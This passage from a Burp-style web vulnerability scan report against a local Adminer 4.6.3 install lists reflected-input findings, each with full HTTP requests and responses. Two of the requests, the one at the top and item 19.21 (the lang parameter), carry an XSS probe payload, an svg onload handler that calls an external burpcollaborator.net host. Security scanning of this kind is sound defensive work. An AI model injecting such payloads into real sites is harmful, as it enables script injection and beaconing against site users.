<h1>Not Found</h1>
<p>The requested URL /add_vhost.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//aycdowl4l1exqvr83lsjus1ktbz6n1bt1hv4msb\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.10. http://localhost/adminer [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /adminerikkv5cv4e8 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 300
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adminerikkv5cv4e8 was not found on this server.</p>

...[SNIP]...
19.11. http://localhost/adminer/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /admineraps3pk6u1d/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/?lang=czech

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /admineraps3pk6u1d/ was not found on this server.</p>
...[SNIP]...
19.12. http://localhost/adminer/adminer-4.6.3.php [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /adminer/adminer-4.6.3.phph5og0tvy1n HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:05 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adminer/adminer-4.6.3.phph5og0tvy1n was not found on this server.</p>
...[SNIP]...
19.13. http://localhost/adminer/adminer-4.6.3.php [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /adminerjscwhyjcsu/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adminerjscwhyjcsu/adminer-4.6.3.php was not found on this server.</p>
...[SNIP]...
19.14. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the adminer_key cookie is copied into the application's response.

Request 1

GET /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31fqvbv5pyo8e; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:03:06 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31fqvbv5pyo8e; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ODRkNzRjN2Y5YmE4YzBlZTE0YzVkODZhNzU3MDMzMGI=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
19.15. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the adminer_permanent cookie is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=8kkaorupn9

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:14:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:14:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=8kkaorupn9; expires=Sat, 17 Nov 2018 21:14:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MWU2ZWVmNmVkZTZlZmMyN2JhMDQxNTIzZmRhNDFkNjM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4492
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
19.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5bdb%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOsugbtl8nvlo

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:11:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:11:15 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDMzMTUyYzU1YzFlOTM3OGY2OTUzYTNlNTBlYjQ0YjM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4503
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
OTM3OGY2OTUzYTNlNTBlYjQ0YjM=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=WVXmekzw&username=FsyZhLfc&db=VICYSKOsugbtl8nvlo&', '14945:960622')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[db]" value="VICYSKOsugbtl8nvlo" autocapitalize="off">
...[SNIP]...
19.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5bdriver%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=if12n6mpoth7rrr8db2b98pbgd; adminer_key=ee5a97bb7d42e79ebb4dfad235644413

auth%5bdriver%5d=servera7s2htqtfq&auth%5bserver%5d=hvdhksIt&auth%5busername%5d=SvdSIQmY&auth%5bpassword%5d=g3P%21p0i%21F6&auth%5bdb%5d=qYkgBFYR&auth%5bpermanent%5d=1

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=c2VydmVyYTdzMmh0cXRmcQ%3D%3D-aHZkaGtzSXQ%3D-U3ZkU0lRbVk%3D-cVlrZ0JGWVI%3D%3A6e7Uou0JbQpEG8uIZzC6UA%3D%3D; expires=Sat, 17 Nov 2018 21:02:38 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YjNjMDhlYmJlYzBjOTE1MThhYWJiZTM5MWY0NGUwNTg=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4782
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<a href='/adminer/adminer-4.6.3.php?servera7s2htqtfq=hvdhksIt&amp;username=SvdSIQmY&amp;db=qYkgBFYR&amp;servera7s2htqtfq=hvdhksIt'>
...[SNIP]...
19.18. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5bserver%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=bp3upadpsu2m2m0t3rkbiuh4ip; adminer_key=a29b0ef6b673e85bda436f5358e30b8b

auth%5bdriver%5d=server&auth%5bserver%5d=gPsfQieMnyafu0bl60&auth%5busername%5d=wWXwJEEF&auth%5bpassword%5d=x6D%21r9q%21H5&auth%5bdb%5d=AhfDADgK&auth%5bpermanent%5d=1

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:15 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YzMzMGU1YTU0YTYzOWMxNmE1MDZlZWU4YThkMGQ5YWY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4523
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieMnyafu0bl60 - Adminer</title>
...[SNIP]...
script nonce="YzMzMGU1YTU0YTYzOWMxNmE1MDZlZWU4YThkMGQ5YWY=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieMnyafu0bl60&username=wWXwJEEF&db=AhfDADgK&', '271915:612690')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
<
...[SNIP]...
<input name="auth[server]" value="gPsfQieMnyafu0bl60" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
...[SNIP]...
19.19. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5busername%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfcyzmzsuuj7b&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOs

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:08:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:08:16 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDM4NzI4NTgzOGFlYTE3ZTkyNDY2ZmZiNTY5YTM4ZTc=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4505
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
NzI4NTgzOGFlYTE3ZTkyNDY2ZmZiNTY5YTM4ZTc=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=WVXmekzw&username=FsyZhLfcyzmzsuuj7b&db=VICYSKOs&', '670762:306725')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[username]" id="username" value="FsyZhLfcyzmzsuuj7b" autocapitalize="off">
...[SNIP]...
19.20. http://localhost/adminer/adminer-4.6.3.php [db parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the db request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgKx3on59zwuj HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:07:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:07:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:07:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MjhmYTZjM2JmNDBhMGVhMGQzMDA4YzBmYTE3MDBjZmU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4505
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
MGVhMGQzMDA4YzBmYTE3MDBjZmU=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgKx3on59zwuj&', '952081:260200')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[db]" value="AhfDADgKx3on59zwuj" autocapitalize="off">
...[SNIP]...
19.21. http://localhost/adminer/adminer-4.6.3.php [lang parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the lang request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang='%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fc6jfwyt6t3mzyxzabn0l2u9m1d78vznnfd35qvek%5c56burpcollaborator.net'%3e&token=240285%3a176068

Response 1

HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 17:06:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZDZjODNmMGJhMzU4MDRlOWM5NTczZWE0ZDkwOTMwYTk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4650
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<input type="hidden" name="lang" value="&#039;&quot;&gt;&lt;svg/onload=(new(Image)).src=&#039;//c6jfwyt6t3mzyxzabn0l2u9m1d78vznnfd35qvek\56burpcollaborator.net&#039;&gt;">
...[SNIP]...
19.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /adminer/adminer-4.6.3.php/lz29mou94s HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:04:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:04:06 GMT; path=/adminer/adminer-4.6.3.php/lz29mou94s; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php/lz29mou94s; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NTBiNTgyNmIzNjg0NDhmMzIzMGFiYjA1YTc0NDYwMGY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4289
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="stylesheet" type="text/css" href="lz29mou94s?file=default.css&amp;version=4.6.3">
...[SNIP]...
<script src='lz29mou94s?file=functions.js&amp;version=4.6.3' nonce="NTBiNTgyNmIzNjg0NDhmMzIzMGFiYjA1YTc0NDYwMGY=">
...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="lz29mou94s?file=favicon.ico&amp;version=4.6.3">
...[SNIP]...
<link rel="apple-touch-icon" href="lz29mou94s?file=favicon.ico&amp;version=4.6.3">
...[SNIP]...
<script nonce="NTBiNTgyNmIzNjg0NDhmMzIzMGFiYjA1YTc0NDYwMGY=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'lz29mou94s?', '740364:674133')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
19.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the server request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieMolq4x542tc&username=wWXwJEEF&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:37 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:02:37 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:02:37 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjVkMjMwNzY3YmViZTdiZDUyN2Y0YWFlMWQwNWRiOWM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4514
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieMolq4x542tc - Adminer</title>
...[SNIP]...
script nonce="NjVkMjMwNzY3YmViZTdiZDUyN2Y0YWFlMWQwNWRiOWM=">
